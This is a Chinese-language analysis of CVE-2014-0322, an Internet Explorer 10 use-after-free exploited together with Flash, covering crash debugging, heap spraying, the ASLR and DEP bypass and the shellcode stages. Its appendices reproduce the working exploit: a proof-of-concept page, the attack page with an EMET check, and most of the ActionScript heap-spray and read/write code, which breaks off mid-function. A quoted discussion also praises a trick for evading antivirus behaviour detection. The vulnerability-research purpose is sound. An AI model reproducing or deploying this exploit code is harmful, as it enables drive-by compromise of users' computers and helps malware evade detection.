CVE-2014-0322漏洞成因与利用分析

CVE-2014-0322漏洞成因与利用分析

1. 简介

  此漏洞是UAF(Use After Free)类漏洞,即引用了已经释放的内存,对指定内存处的值进行了加1。其特点在于攻击者结合flash实现了对漏洞的利用,第一次分析这种IE+Flash组合的漏洞利用因此写下此文档作为记录。

 

2. 实验环境

  操作系统:Win7 SP1

  浏览器:IE 10.0.9200.16798(补丁打到MS14-010(KB2909921))

  漏洞编号:CVE-2014-0322

  微软补丁:MS14-012

 

3. 漏洞分析(poc.html)

3.1. 分析Crash

3.1.1. 运行poc,查看crash

技术文章

  看到crash原因是 inc dword ptr [eax+10h] 处引用了无效的内存空间。查看崩溃处的上下文。

技术文章

  在crash前有mov eax,dword ptr [edx+0ACh]。查看edx, edx=02ee1690 。查看函数调用回溯。

技术文章

  可见edx也是MSHTML!CMarkup::NotifyElementEnterTree 的第一个参数,它是一个0x340大小的对象,也是释放后被重用的对象。

技术文章

 

3.2. 跟踪调试、分析漏洞成因

3.2.1. 调试工作准备

  开启gflags.exe的Create user mode stack trace database功能(用于进行堆回溯)。

 

  可以在POC中加入如下用于跟踪执行流程的调试语句

    IE10下:alert("[*] Before swapNode");

 

  设置以下断点,观察被释放的对象

    bu MSHTML!CMarkup::NotifyElementEnterTree

 

3.2.2. 定位释放后重用的对象

  此POC的执行流程比较简单,b.onpropertychange = fun ;后立即触发了onpropertychange事件,调用fun。

  执行c = b.appendChild(c);后来到了MSHTML!CMarkup::NotifyElementEnterTree。

技术文章

 

  此时分析栈上的参数1即Object的地址,dword [esp+0x4]。可见当调用 appendChild 时 MSHTML!CElement::Var_appendChild 被调用,在这个过程中一个新的CMarkup对象(CMarkupObject)被创建。

技术文章

 

  查看此时函数调用回溯,

技术文章

 

  注意到 Var_appendChild -> NotifyElementEnterTree。

 

3.2.3. 跟踪对象释放过程

  因为是一个UAF漏洞,因此对CMarkup Object的释放函数下断点进行观察。继续跟踪NotifyElementEnterTree,此过程最终会调用NotifyElementEnterTree+0x1df。随后调用call CElement::HandlleTextChange(bool),此函数会触发onpropertychange事件,回调函数fun被调用。

 

    bu MSHTML!CMarkup::Release ".if ( poi(esp+0x4) == 0627af48){} .else{gc}"

    bu ntdll!RtlFreeHeap ".if ( poi(esp+0xc) == 0627af48 ){} .else{gc}"

    bu MSHTML!CElement::HandleTextChange

 

  可以观察到3次CMarkup::Release,最后一次CMarkup::Release随后调用了RtlFreeHeap从而释放了CMarkup Object。

  在RtlFreeHeap处被断下时观察调用堆栈回溯

技术文章

   上面这里可以看出JS语句“this.outHTML = this.outHTML”导致了CMarkup Object的释放,执行流程为:

  CElement::put_outerHTML->CElement::InjectTextOrHTML->CElement::InjectInternal->HandleHTMLInjection->InjectHtmlStream.

 

技术文章

   InjectHtmlStream调用MSHTML!CMarkup::Release函数并返回后,会到MSHTML!InjectHtmlStream+0x6f9 即 65d146a3 处继续运行

 

3.2.4. 内存占位

  CMarkup对象释放后立即对内存进行占位,通过对RtlAllocateHeap设置条件断点,可以定位刚刚被释放的内存被占位成功。

  ntdll!RtlAllocateHeap+XXX(定位函数返回时eax的值,换成硬编码)

    bu 77d92eb8 ".if (eax == 0627af48){} .else{gc}"

 

  这里通过给dib元素的title属性赋值进行内存占位,JS代码如下:

技术文章
var g_arr = [];
var arrLen = 0x250;

var a=0;
for(a=0;a<arrLen;++a)
{
    g_arr[a]=document.createElement(‘div‘)
};

var b = dword2data(0x41414141);
while(b.length<0x360) b += dword2data(0x41414141);
var d=b.substring(0,(0x340-2)/2);            //减2是因为最后有个\u0000终止符

for(a=0;a<arrLen;++a) 
{
    g_arr[a].title=d.substring(0,d.length);
}
技术文章

 

 

技术文章

 

3.2.5. 小结

  此漏洞的效果总结来说就是可以对任意地址的一个字节实现+1。

 

4. 漏洞利用(ie10_0day.html & TopeTest.as)

4.1. 调试环境搭建

  样本包含了一个html和一个as脚本,我通过Adobe Flash Builder 4.5生成swf(据说通过Adobe Dreamweaver CS生成的swf会更小一些);同时需要安装debug版的flashplayer,这里安装flashplayer_13_ax_debug.exe。通过Adobe Flash Builder 4.5设置断点进行动态调试,同时使用WinDbg附加到IE查看跟踪内存及指令。

  注意,还要在本地flash设置中指定受信任的文件目录,防止Actionscript中有些操作无法执行。

 

4.2. 样本内存占位(ie10_0day.html)

  观察之前crash的位置,inc dword ptr [eax+10h];对eax+10h内存处进行了加1操作,而eax则从对象UserPtr+0ACh处读取而来。

技术文章

  因此在对内存进行占位时,需要在偏移0xAC处设置,将其设置为需要改写的指定内存。

样本实现如下:

技术文章
var b = dword2data(0xdeadc0de);
var c = 0x1a1b2000;                       // 内存0x1a1b2000处是某个unit vector的size字段

while (b.length < 0x360) 
{
    if (b.length == (0x94 / 2)) 
    {
        b += dword2data(c + 0x10 - 0x0c)
    } 
    else if (b.length == (0x98 / 2)) 
    {
        b += dword2data(c + 0x14 - 0x8)
    } 
    else if (b.length == (0xac / 2))         // mov eax,dword ptr [edx+0ACh]
    {
        b += dword2data(c - 0x10)            // inc dword ptr [eax+10h]
    } 
    else if (b.length == (0x15c / 2)) 
    {
        b += dword2data(0x42424242)
    } 
    else 
    {
        b += dword2data(0x1a1b2000 - 0x10)        
    }
};
            
var d = b.substring(0, (0x340 - 2) / 2);    
技术文章

 

4.3. 样本内存操作(TopeTest.as)

4.3.1. 堆喷射

  样本中使用uint vector进行堆喷射,每个uint vector占0x1000字节,其中前8字节(前4字节为size字段)为头部,之后为数据,每个vector对象包含1022(0x3fe)个元素。进行大量堆喷射后,内存0x1A1B2000将是某个uint vector起始位置。可以通过漏洞修改其size字段,使其长度加一,从而修改下一个uint vector的长度为0x3FFFFFF0,从而实现任意内存的读写。

  样本同样喷射了少量object vector,每个object vector占0x1000字节(1007*4+40+28=4096,其中28字节空闲),其中前40字节为头部,之后为数据,每个vector对象包含1007(0x3ef)个元素。其中object vector每个元素里存放同一个flash.media.Sound对象的引用(实际值是对象地址加1),用来Bypass ASLR及获取控制权。

 

4.3.2. 任意内存读写

  漏洞触发后首先循环搜索被修改长度的uint vector(V1),然后通过其修改下一个uint vector(V2)的长度为0x3FFFFFF0,通过V2可以实现任意内存地址的读写。其原理如下,其中a为V2后地址块(4字节)的个数,b为V2前地址块(4字节)的个数:

    V2_BaseAddrss + a * 4 + b * 4 = WantAddress + 0x100000000

-->

    a + b = (WantAddressV2_BaseAddrss + 0x100000000) / 4

 

  可以通过V2[a+b]实现任意内存的地址读写

 

4.3.3. Bypass ASLR

  前面喷射的object vector每个元素里存放着同一个flash.media.Sound对象的引用(实际值是对象地址加1),通过flash.media.Sound对象的虚函数表地址可以定位Flash32_13_0_0_214.dll的基地址,最终获取kernel32.dll的基地址。其过程如下:

 

    flash.media.Sound对象引用

    -->flash.media.Sound对象地址

    -->flash.media.Sound对象虚函数表

    -->flash32_13_0_0_214.dll BaseAddress

    -->flash导入表,获取kernel32函数地址(kernel32!GetCurrentThreadId Address)

    -->kernel32.dll BaseAddress

    -->kernel32导入表,获取ntdll函数地址(ntdll!RtlQueryEnvironmentVariable)

    -->ntdll.dll BaseAddress

    -->ntdll!ZwProtectVirtualMemory Address

    -->xchg eax,esp; retn; Address

 

4.3.4. Bypass DEP

  伪造虚函数表,动态构造ROP,伪造虚函数表的第0x1C个虚函数,相对伪造的虚函数表的首地址(0x1a1b3100)偏移为0x70。使第0x1C个虚函数指向xchg eax,esp; retn;指令串地址。

  通过V2修改flash.media.Sound对象的虚函数表地址,使其指向0x1a1b3100,然后调用flash.media.Sound对象的toString()方法,从而获取控制权限,执行ROP。

 

4.3.5. shellcode分析

  通过ROP chain修改完内存执行属性后,执行第一阶段shellcode,它会还原对象虚函数表地址,然后跳转到第二阶段shellcode。

  第二阶段shellcode主要完成远程代码的执行,通过搜索API,完成dll的释放与加载。获取kernel32.dll BaseAddress的过程需要注意,不过这部分方法通用。还需注意shellcode中对inline hook的检查,jpg的解码与释放。具体过程请附录《第二阶段shellcode分析》

 

4.4. 小技巧(TopeTest.as)

  样本的shellcode通过加载的dll来运行exe,可能是为了躲避某些杀软的行为检测。大家在微薄上面的讨论如下:

技术文章
它的shellcode框架可能是复用的。

dllmain的fdwReason为PROCESS_DETACH时才运行exe,即IE10退出时才执行EXE,恐怕这个小技巧就可以绕过很多基于进程行为的检测吧

如果单纯为了通用的话,代码可以写在dll里。我觉得可能是逃避检测的一种方式,恶意代码不会运行在IE的进程空间内。

嗯,我觉得可能是为了第三方使用配置方便,再就是绕过一些检测,曾用过类似技巧。
技术文章

 

 

5. 总结

  本样本利用了IE的UAF漏洞,并结合flash vector实现了ASLR & DEP的绕过。此方法已经在多种网页挂马中使用,由于大部分防护软件可能还未考虑到利用flash来配合漏洞利用,并且此方法具有隐蔽性,值得大家关注。

 

6. 参考资料

[1] CVE-2014-0322 0day root cause analysis:

http://www.secniu.com/blog/cve-2014-0322-0day-root-cause-analysis/

[2] CVE-2014-0322 0day Exploit分析:

http://bbs.pediy.com/showthread.php?t=184608

[3] Adobe ActionScript 3.0 编程帮助:

http://help.adobe.com/zh_CN/ActionScript/3.0_ProgrammingAS3/

 

7. 附录

7.1. poc.html

技术文章
<html>
<head id="headId">
<title>main page</title>
<script>
function dword2data(dword) {
    var d = Number(dword).toString(16);
    while (d.length < 8)
        d = ‘0‘ + d;
    return unescape(‘%u‘ + d.substr(4, 8) + ‘%u‘ + d.substr(0, 4));
}

var g_arr = [];
var arrLen = 0x250;

function fun()
{
    alert("[*] Enter onpropertychange");
    var a=0;
    // to alloc the memory
    for(a=0;a<arrLen;++a)
    {
        g_arr[a]=document.createElement(‘div‘)
    };

    var b = dword2data(0x41414141);
    while(b.length<0x360) b += dword2data(0x41414141);
    var d=b.substring(0,(0x340-2)/2);
    try{
        this.outerHTML=this.outerHTML                    // 引发DOM的释放,造成CMarkup对象的释放
    } catch(e){}
    CollectGarbage();
    //to reuse the freed memory
    for(a=0;a<arrLen;++a)                                // 在CMarkup对象被释放后,样本立即尝试将释放的内存站位
    {
        g_arr[a].title=d.substring(0,d.length);
    }
    // 在CMarkup对象被释放并占位以后,程序继续运行,来到CMarkup::UpdateMarkupContentVersion(void),因此这个漏洞的效果为:可以对任意地址的一个字节实现+1
    alert("[*] Leave onpropertychange");
}

function puIHa3() {
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = fun ;                            // 为script节点设置onpropertychange处理函数
    var c = document.createElement(‘SELECT‘);            // 创建一个select节点
    alert("[*] Before appendChild");
    c = b.appendChild(c);                                // 将新创建的select节点附加到script节点上
    alert("[*] After appendChild");
    // 当调用 appendChild 时 MSHTML!CElement::Var_appendChild 被调用
    // 在这个过程中一个新的CMarkup对象(CMarkupObject)会被创建,此过程最终会调用MSHTML!CMarkup::NotifyElementEnterTree+0x1df
    // 随后调用call CElement::HandlleTextChange(bool),此函数会触发onpropertychange事件,回调函数fun被调用
}

puIHa3();

</script>
</head>
</html>
View Code

  

7.2. ie10_0day.html

技术文章
<html>

<head id="headId">
    <title>main page</title>
    <script>
    
        function dword2data(dword) 
        {
            var d = Number(dword).toString(16);
            while (d.length < 8)
                d = ‘0‘ + d;
            return unescape(‘%u‘ + d.substr(4, 8) + ‘%u‘ + d.substr(0, 4));
        }

        function developonther(txt) 
        {
            var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
            xmlDoc.async = true;
            xmlDoc.loadXML(txt);
            if (xmlDoc.parseError.errorCode != 0) 
            {
                var err;
                err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
                err += "Error Reason: " + xmlDoc.parseError.reason;
                err += "Error Line: " + xmlDoc.parseError.line;
                if (err.indexOf("-2147023083") > 0) 
                {
                    return 1;
                } 
                else 
                {
                    return 0;
                }

            }
            return 0;
        }

        var g_arr = [];
        var arrLen = 0x250;

        function fun() 
        {
            var a = 0;
            for (a = 0; a < arrLen; ++a) 
            {
                g_arr[a] = document.createElement(‘div‘)
            };
            var b = dword2data(0xdeadc0de);
            var c = 0x1a1b2000;                                // 内存0x1a1b2000处是某个unit vector的size字段
            while (b.length < 0x360) 
            {
                if (b.length == (0x94 / 2)) 
                {
                    b += dword2data(c + 0x10 - 0x0c)
                } 
                else if (b.length == (0x98 / 2)) 
                {
                    b += dword2data(c + 0x14 - 0x8)
                } 
                else if (b.length == (0xac / 2))             // mov eax,dword ptr [edx+0ACh]
                {
                    b += dword2data(c - 0x10)                // inc dword ptr [eax+10h]
                } 
                else if (b.length == (0x15c / 2)) 
                {
                    b += dword2data(0x42424242)
                } 
                else 
                {
                    b += dword2data(0x1a1b2000 - 0x10)        
                }
            };            
            var d = b.substring(0, (0x340 - 2) / 2);
            
            
            try 
            {
                this.outerHTML = this.outerHTML                // 引发DOM的释放,造成CMarkup对象的释放
            } 
            catch (e) {}
            
            CollectGarbage();
            
            //在CMarkup对象被释放后,样本立即尝试将释放的内存站位
            for (a = 0; a < arrLen; ++a) 
            {                        
                g_arr[a].title = d.substring(0, d.length);
            }
            // 在CMarkup对象被释放并占位以后,程序继续运行,来到CMarkup::UpdateMarkupContentVersion(void),其后的指令:inc dword ptr [eax+10h]会将其数据加1。 因此这个漏洞的效果为:可以对任意地址的一个字节实现+1
        }
        //触发漏洞,这是一个CMarkup对象的user-after-free漏洞:当调用appendChild时,MSHTML!CElement::Var_appendChild被调用,在这个过程中一个新的CMarkup对象(CMarkupObject)会被创建,此过程最终会调用MSHTML!CMarkup::NotifyElementEnterTree+0x1df---call CElement::HandlleTextChange(bool) ,此函数会触发onpropertychange事件,回调函数fun被调用
        function puIHa3() 
        {
            var bamboo_go = "<!DOCTYPE html PUBLIC ‘-//W3C//DTD XHTML 1.0 Transitional//EN‘ ‘res://C:\\windows\\AppPatch\\EMET.DLL‘>";

            if (navigator.userAgent.indexOf("MSIE 10.0") > 0) 
            {            
                if (developonther(bamboo_go)) 
                {
                    return;
                }
                var a = document.getElementsByTagName("script");
                var b = a[0];
                b.onpropertychange = fun;                            //为script节点设置onpropertychange处理函数
                var c = document.createElement(‘SELECT‘);            //创建一个select节点
                c = b.appendChild(c);                                //将新创建的select节点附加到script节点上
            }
            else if (navigator.userAgent.indexOf("IE10") > 0) 
            {
                if (developonther(bamboo_go)) 
                {
                    return;
                }
                var a = document.getElementsByTagName("script");
                var b = a[0];
                b.onpropertychange = fun;
                var c = document.createElement(‘SELECT‘);
                c = b.appendChild(c);
            }
        }
        
    </script>
    <embed src=TopeTest.swf width=10 height=10></embed>
</head>


</html>
View Code

 

7.3. TopeTest.as

技术文章
package 
{
    import flash.display.Sprite;
    import flash.utils.ByteArray;
    import flash.net.URLLoader;
    import flash.utils.Timer;
    import __AS3__.vec.Vector;
    import flash.media.Sound;
    import flash.text.TextField;
    import flash.net.SharedObject;
    import flash.net.URLRequest;
    import flash.net.URLLoaderDataFormat;
    import flash.events.Event;
    import flash.external.ExternalInterface;    
    import flash.events.TimerEvent;
    import flash.utils.Endian;
    import flash.events.*;
    import flash.display.*;
    import flash.utils.*;
    import flash.net.*;
    import __AS3__.vec.*;
    import flash.media.*;
    import flash.text.*;
    import flash.external.*;
    import flash.system.Security;
    
    //定义TopeTest类(继承自Sprite)
    public class TopeTest extends Sprite 
    {
        
        private var jpgByte:ByteArray;
        private var loader:URLLoader;
        public var store_bytes:ByteArray;
        var found:Boolean = false;
        var delay:uint = 5000;
        public var m_Ostring:String = "Pidj7gbU";
        var work:Timer;
        var repeat:uint = 0x1000;
        var m_mark:Boolean = false;
        
        var snd:Sound;
        public var org:String = "vector";
        public var m_rawLen = 0;
        public var tf:TextField;
        public var s:Vector.<Object>;         // 用于vectors spray
        public var ss:Vector.<Object>;         // 用于object spray
        public var m_mySo:SharedObject;
        var to:String = "\x1D\x01\x01\x05OZZDLG[DCM[GE[@AZ\x16\x14\x19\x16DDD[\x10\r\x10uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu0000000000000000000000\x01\x02";
        
        
        
        /*---------------构造函数---------------*/
        public function TopeTest()
        {
            this.jpgByte = new ByteArray();
            this.store_bytes = new ByteArray();
            this.loader = new URLLoader();
            super();
            var request:URLRequest = new URLRequest();
            request.url = "Erido.jpg";
            this.loader.dataFormat = URLLoaderDataFormat.BINARY;
            //this.loader.addEventListener(Event.COMPLETE, this.E_xx);
            //this.loader.load(request); 
            Security.allowDomain("*");
            E_xx();
        }
        
        /*---------------实现堆喷射,内存布局---------------*/
        public function E_xx():void                            
        {
            this.tf = new TextField();
            this.snd = new Sound();
            this.s = new Vector.<Object>(98688);                    // totally 98688 vectors to spray.
            this.ss = new Vector.<Object>(12);
            this.work = new Timer(this.delay, this.repeat);        // 等待漏洞触发结束
            var _local2:* = 0;
            var _local3:* = 0;
            var _local4:* = 0;
            var _local5:* = "";
            var _local6:* = "";
            var _local7:* = ((0x1000 / 4) - 2);                        // each vector has 0x3fe elements
            var _local8:* = 0;
            var _local9:* = ((0x1000 / 4) - 17);                    // each object has 0x3ef elements(原始的)
            //var _local9:* = (0x1000-40) / 4;                        // each object has 0x3f6 elements
            
            _local2 = 0;
            this.m_rawLen = _local7;
            var _local10:* = 0x1A1B2000;
            
            // spray大量uint vector,每个vector对象包含1022(0x3fe)个元素,和一个8字节头部(其中前4字节为size字段),因此每个对象占1022×4+8=4096字节
            while (_local2 < 98688)                                    // spray 98688个vector
            {
                this.s[_local2] = new Vector.<uint>(_local7);        // create one of the vectors
                this.s[_local2][0] = 3735928545;
                _local8 = 1;
                this.s[_local2][((16 - 8) / 4)] = _local10;
                this.s[_local2][((20 - 8) / 4)] = _local10;
                this.s[_local2][((752 - 8) / 4)] = 0x41414141;
                this.s[_local2][((448 - 8) / 4)] = 0;
                this.s[_local2][(0x3fe-1)] = 0x90909090;
                _local2++;
            };
            
            // spray少量flash object vector,里面存放同一个flash.media.Sound对象的引用,每个vector对象包含1007(0x3ef)/1014(0x3f6)个元素,和一个40字节头部,因此每个对象占1007*4+40+28=4096 / 1014*4+40=4096字节
            _local2 = 0;
            while (_local2 < 0x0400)                                // spray 1024个vector            
            {
                this.ss[_local2] = new Vector.<Object>(_local9);    // create one of the vectors
                _local3 = 0;
                while (_local3 < _local9)
                {
                    this.ss[_local2][_local3] = this.snd;            //每个object vector里存放同一个flash.media.Sound对象的引用
                    _local3++;
                };
                _local2++;
            };
            
            
            if (ExternalInterface.available)                        // 做完 heap sprayheap后, flash里面会通过 ExternalInterface 调用 index.html里面的 “puIHa3”函数
            {
                ExternalInterface.call("puIHa3", this.org);
                //ExternalInterface.call("puIHa3", this.org);
            };
            this.work.start();
            this.work.addEventListener(TimerEvent.TIMER, this.proc);    // spary结束后调用proc
            return;
        }
        
        function DetmineCookie():Boolean
        {
            if (((this.m_mySo.data.hasOwnProperty("Cookie")) && (this.m_mySo.data.hasOwnProperty("newDate"))))
            {
                if (this.m_mySo.data.Cookie == this.m_Ostring)
                {
                    return (true);
                };
            };
            return (false);
        }
        
        function ShareObjEx():Boolean
        {
            var _local1:Date = new Date();
            var _local2:* = _local1.getTime();
            this.m_mySo.data.Cookie = this.m_Ostring;
            this.m_mySo.data.newDate = _local2;
            this.m_mySo.flush();
            return (true);
        }
        
        
        /*---------------Html触发漏洞后调用,实现inc-by-one,最终任意内存读写,构造ROP---------------*/
        function proc(_arg1:TimerEvent):void
        {
            var _local3:uint;
            var _local4:uint;
            var _local5:uint;
            var _local6:TimerEvent;
            var _local7:int;
            var _local8:uint;
            var _local9:uint;
            var _local10:uint;
            var _local11:uint;
            var _local12:uint;
            var _local13:uint;
            var _local14:uint;
            var _local15:uint;
            var _local16:*;
            var _local17:uint;
            var _local18:int;
            var _local19:String;
            var _local20:uint;
            var _local21:uint;
            var _local22:uint;
            var _local23:uint;
            var _local24:uint;
            var _local25:uint;
            var _local26:uint;
            var _local27:uint;
            var _local28:*;
            var _local29:int;
            var _local30:int;
            var _local31:uint;
            var _local32:int;
            var _local33:*;
            var _local34:uint;
            var _local35:uint;
            var _local36:uint;
            var _local37:*;
            var _local38:uint;
            var _local39:*;
            var _local44:int;
            var _local2:uint;
            _local5 = 0;
            _local25 = 0;
            _local35 = 0;
            _local3 = 0;
            _local36 = 0;
            _local17 = 0;
            _local4 = 0;
            _local9 = 0;
            _local11 = 0;
            _local21 = 0;
            _local34 = 0;
            _local23 = 0;
            _local20 = 0;
            _local27 = 0;
            _local12 = 0;
            _local31 = 0;
            _local38 = 0;
            _local19 = null;
            _local13 = 0;
            _local14 = 0;
            _local22 = 0;
            _local29 = 0;
            _local32 = 0;
            _local30 = 0;
            _local7 = 0;
            _local15 = 0;
            _local8 = 0;
            _local10 = 0;
            _local24 = 0;
            _local26 = 0;
            _local6 = _arg1;
            _local28 = _local6;
            _local18 = 0;
            _local16 = 0x1A1B2000;
            _local33 = 4064;
            _local37 = 0x8000;
            _local21 = 437985288;        // 0x1A1B2008
            
            /*
            if (this.found)
            {
            return;
            };
            */
            
            // 搜索被修改size的那个uint vector(V1,V1原始size是0x3fe,修改后是0x3ff)        ——        _local29 == V1
            _local29 = 0;
            while (_local29 < 98688)
            {
                try
                {
                    if ((this.s[_local29] as Vector.<uint>).length > this.m_rawLen) break;
                }
                catch(e:Error)
                {
                };
                _local29 = (_local29 + 1);
            };
            if (_local29 == 98688)
            {
                return;
            };
            
            
            this.found = true;
            
            _local32 = 1;
            this.s[_local29][(((0x1000 * _local32) / 4) - 2)] = 1073741808;        //利用V1修改下一个uint vector(V2)的size为1073741808(3FFFFFF0)
            
            _local2 = _local29;
            _local30 = _local29;
            while (_local30 < (_local29 + 10))
            {
                if (this.s[_local30].length == 1073741808)
                {
                    _local7 = _local30;                                                // _local7 == V2    _local30 == V2
                    _local21 = (_local21 + ((_local30 - _local29) * 0x1000));        // _local21 == 0x1A1B2008 + 0x1000;        _local21为V2数据部分的地址(跳过前8字节)        ######################
                    _local32 = 100;                                                    // _local32 == 100
                    break;
                };
                _local30 = (_local30 + 1);
            };
            if (_local30 == (_local29 + 10))
            {
                return;
            };
            
            _local4 = ((_local21 + 4088) + ((98688 - _local7) * 0x1000));            // _local4 为uint vector堆喷射末尾最后一个uint vector的地址                            ######################
            _local29 = 0;
            while (_local29 < _local37)        // _local37 == 0x8000
            {
                try
                {
                    if ((((((((_local4 + (_local29 * 0x1000)) % 65536) == 0)) && (!((this.s[_local7][(((_local4 + (_local29 * 0x1000)) - _local21) / 4)] == this.m_rawLen))))) && (!((this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21) / 4) + 1)] == _local33)))))
                    {
                        _local4 = (_local4 + 65536);
                        if (_local29 != 0)
                        {
                            _local29--;
                        };
                    }
                    else
                    {
                        if ((((((this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21) / 4) + 1)] == _local33)) && ((this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21) / 4) + 17)] > 0)))) && ((this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21) / 4) + 17)] == this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21) / 4) + 100)]))))
                        {
                            //_local4 = this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21) / 4) + 17)];
                            _local4 = this.s[_local7][((((_local4 + (_local29 * 0x1000)) - _local21 + 68) / 4))];    // 68为object vector的头部长(实际object vector头部长为0x40,这里无关紧要,不影响)        _local4 == 某个flash.media.Sound对象的引用        ######################
                            break;
                        };
                    };
                }
                catch(e:Error)
                {
                };
                _local29 = (_local29 + 1);
            };
            if (_local29 == _local37)
            {
                return;
            };
            
            // Get Flash32_13_0_0_214.dll BaseAddress == _local12
            _local4 = (_local4 & 0xFFFFFFFC);
            _local27 = _local4;            // _local27 == flash.media.Sound对象的地址                ######################
            if (_local21 > _local4)        // Get flash.media.Sound对象虚函数表,然后 & 0xFFFF0000
            {
                _local12 = (this.s[_local7][(0x40000000 + ((_local4 - _local21) / 4))] & 0xFFFF0000);        // V2_BaseAddrss + a * 4 + b * 4 = WantAddress + 0x100000000   -->  a + b = (W - V2 + 0x100000000) / 4
            }
            else
            {
                _local12 = (this.s[_local7][((_local4 - _local21) / 4)] & 0xFFFF0000);
            };
            _local32 = (_local12 / 65536);
            _local29 = 0;
            while (_local29 < _local32)            // 搜索MZ头    0x10000对齐
            {
                try
                {
                    if (_local12 > _local21)
                    {
                        if ((this.s[_local7][((_local12 - _local21) / 4)] % 65536) == 23117) break;
                        _local12 = (_local12 - 0x10000);
                    }
                    else
                    {
                        if ((this.s[_local7][(0x40000000 + ((_local12 - _local21) / 4))] % 65536) == 23117) break;
                        _local12 = (_local12 - 0x10000);
                    };
                }
                catch(e:Error)
                {
                };
                _local29 = (_local29 + 1);
            };
            if (_local29 == _local32)
            {
                return;
            };
            
            // 通过PE文件格式定位导入表
            if (_local12 > _local21)
            {
                _local22 = this.s[_local7][(((_local12 - _local21) + 60) / 4)];
                _local22 = this.s[_local7][((((_local12 - _local21) + _local22) + 128) / 4)];
            }
            else
            {
                _local22 = this.s[_local7][(0x40000000 + (((_local12 - _local21) + 60) / 4))];
                _local22 = this.s[_local7][(0x40000000 + ((((_local12 - _local21) + _local22) + 128) / 4))];
            };
            _local31 = _local22;
            _local31 = (_local12 + _local31);
            _local15 = _local31;
            _local8 = _local21;
            _local10 = _local12;
            _local24 = 0;
            while (1)
            {
                _local29 = _local18;
                _local31 = _local15;
                _local21 = _local8;
                _local12 = _local10;
                _local24 = (_local24 + 1);
                
                // Get kernel32!GetCurrentThreadId Address
                while (_local29 < 20)
                {
                    try
                    {
                        if (_local31 > _local21)
                        {
                            _local38 = (_local12 + this.s[_local7][((((_local31 - _local21) + (_local29 * 20)) + 12) / 4)]);
                        }
                        else
                        {
                            _local38 = (_local12 + this.s[_local7][(0x40000000 + ((((_local31 - _local21) + (_local29 * 20)) + 12) / 4))]);
                        };
                        _local13 = 0;
                        _local14 = 0;
                        _local32 = ((_local38 & 3) * 8);
                        _local38 = (_local38 & 0xFFFFFFFC);
                        if (_local32 > 0)
                        {
                            if (_local38 > _local21)
                            {
                                _local13 = ((this.s[_local7][((_local38 - _local21) / 4)] >> _local32) + (this.s[_local7][(((_local38 - _local21) / 4) + 1)] << _local32));
                                _local14 = ((this.s[_local7][(((_local38 - _local21) / 4) + 1)] >> _local32) + (this.s[_local7][(((_local38 - _local21) / 4) + 2)] << _local32));
                            }
                            else
                            {
                                _local13 = ((this.s[_local7][(0x40000000 + ((_local38 - _local21) / 4))] >> _local32) + (this.s[_local7][((0x40000000 + ((_local38 - _local21) / 4)) + 1)] << _local32));
                                _local14 = ((this.s[_local7][((0x40000000 + ((_local38 - _local21) / 4)) + 1)] >> _local32) + (this.s[_local7][((0x40000000 + ((_local38 - _local21) / 4)) + 2)] << _local32));
                            };
                        }
                        else
                        {
                            if (_local38 > _local21)
                            {
                                _local13 = this.s[_local7][((_local38 - _local21) / 4)];
                                _local14 = this.s[_local7][(((_local38 - _local21) / 4) + 1)];
                            }
                            else
                            {
                                _local13 = this.s[_local7][(0x40000000 + ((_local38 - _local21) / 4))];
                                _local14 = this.s[_local7][((0x40000000 + ((_local38 - _local21) / 4)) + 1)];
                            };
                        };
                        if ((((_local13 == 1314014539)) && ((_local14 == 842222661))))
                        {
                            if (_local31 > _local21)
                            {
                                _local38 = (_local12 + this.s[_local7][((((_local31 - _local21) + (_local29 * 20)) + 16) / 4)]);
                                _local31 = this.s[_local7][((((_local24 * 4) + _local38) - _local21) / 4)];
                            }
                            else
                            {
                                _local38 = (_local12 + this.s[_local7][(0x40000000 + ((((_local31 - _local21) + (_local29 * 20)) + 16) / 4))]);        // Flash32_13_0_0_214.dll improt——kernel32.dll
                                _local31 = this.s[_local7][(0x40000000 + ((((_local24 * 4) + _local38) - _local21) / 4))];                            // kernel32!GetCurrentThreadId
                            };
                            _local18 = _local29;
                            break;
                        };
                    }
                    catch(e:Error)
                    {
                    };
                    _local29 = (_local29 + 1);
                };
                if (_local29 > 20)
                {
                    return;
                };
                
                // Get kernel32.dll BaseAddress == _local12
                _local12 = (_local31 & 0xFFFF0000);
                _local32 = (_local12 / 65536);
                _local29 = 0;
                while (_local29 < _local32)
                {
                    try
                    {    //搜索MZ头
                        if ((this.s[_local7][((_local12 - _local21) / 4)] % 65536) == 23117) break;
                        _local12 = (_local12 - 65536);
                    }
                    catch(e:Error)
                    {
                    };
                    _local29 = (_local29 + 1);
                };
                if (_local29 == _local32)
                {
                    return;
                };
                
                // Get ntdll!RtlQueryEnvironmentVariable Address
                _local22 = this.s[_local7][(((_local12 - _local21) + 60) / 4)];
                _local22 = this.s[_local7][((((_local12 - _local21) + _local22) + 128) / 4)];
                _local31 = _local22;
                _local31 = (_local12 + _local31);
                _local29 = 0;
                while (_local29 < 2)
                {
                    try
                    {
                        _local38 = (_local12 + this.s[_local7][((((_local31 - _local21) + (_local29 * 20)) + 12) / 4)]);
                        _local32 = ((_local38 & 3) * 8);
                        _local38 = (_local38 & 0xFFFFFFFC);
                        if (_local32 > 0)
                        {
                            _local13 = ((this.s[_local7][((_local38 - _local21) / 4)] >> _local32) + (this.s[_local7][(((_local38 - _local21) / 4) + 1)] << _local32));
                            _local14 = ((this.s[_local7][(((_local38 - _local21) / 4) + 1)] >> _local32) + (this.s[_local7][(((_local38 - _local21) / 4) + 2)] << _local32));
                        }
                        else
                        {
                            _local13 = this.s[_local7][((_local38 - _local21) / 4)];
                            _local14 = this.s[_local7][(((_local38 - _local21) / 4) + 1)];
                        };
                        if ((((_local13 == 1279546446)) || ((_local13 == 1818522734))))
                        {
                            _local38 = (_local12 + this.s[_local7][((((_local31 - _local21) + (_local29 * 20)) + 16) / 4)]);    // kernel.dll import——ntdll.dll
                            _local12 = this.s[_local7][((_local38 - _local21) / 4)];                                            // ntdll!RtlQueryEnvironmentVariable
                            break;
                        };
                    }
                    catch(e:Error)
                    {
                    };
